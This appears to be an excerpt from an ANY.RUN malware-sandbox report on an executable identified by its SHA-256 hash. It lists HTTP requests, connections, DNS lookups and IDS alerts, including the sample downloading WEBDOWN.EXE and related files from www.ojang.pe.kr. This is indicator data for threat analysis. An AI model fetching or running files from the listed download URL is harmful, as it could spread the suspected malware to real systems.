http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
GET
200
119.194.226.67:80
http://www.ojang.pe.kr/CALENDAR/DOWN/WEBDOWN.EXE
unknown
unknown
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
GET
200
119.194.226.67:80
http://www.ojang.pe.kr/CALENDAR/DOWN/WEBDOWN.EXE.ctf
unknown
unknown
6096
WEBDOWN.EXE
GET
200
119.194.226.67:80
http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE.ctf
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5864
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5880
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5880
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
119.194.226.67:80
www.ojang.pe.kr
Korea Telecom
KR
unknown
5880
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 23.219.150.101
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.ojang.pe.kr
  • 119.194.226.67
unknown
www.bing.com
  • 92.123.104.32
  • 92.123.104.34
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 184.30.131.245
whitelisted
login.live.com
  • 20.190.159.4
  • 40.126.31.130
  • 40.126.31.131
  • 20.190.159.75
  • 40.126.31.128
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.129
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted

Threats

PID
Process
Class
Message
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
6096
WEBDOWN.EXE
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
5268
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
3364
WEBDOWN.EXE
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2828
WEBDOWN.EXE
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
5268
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
1468
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
1468
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
4548
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe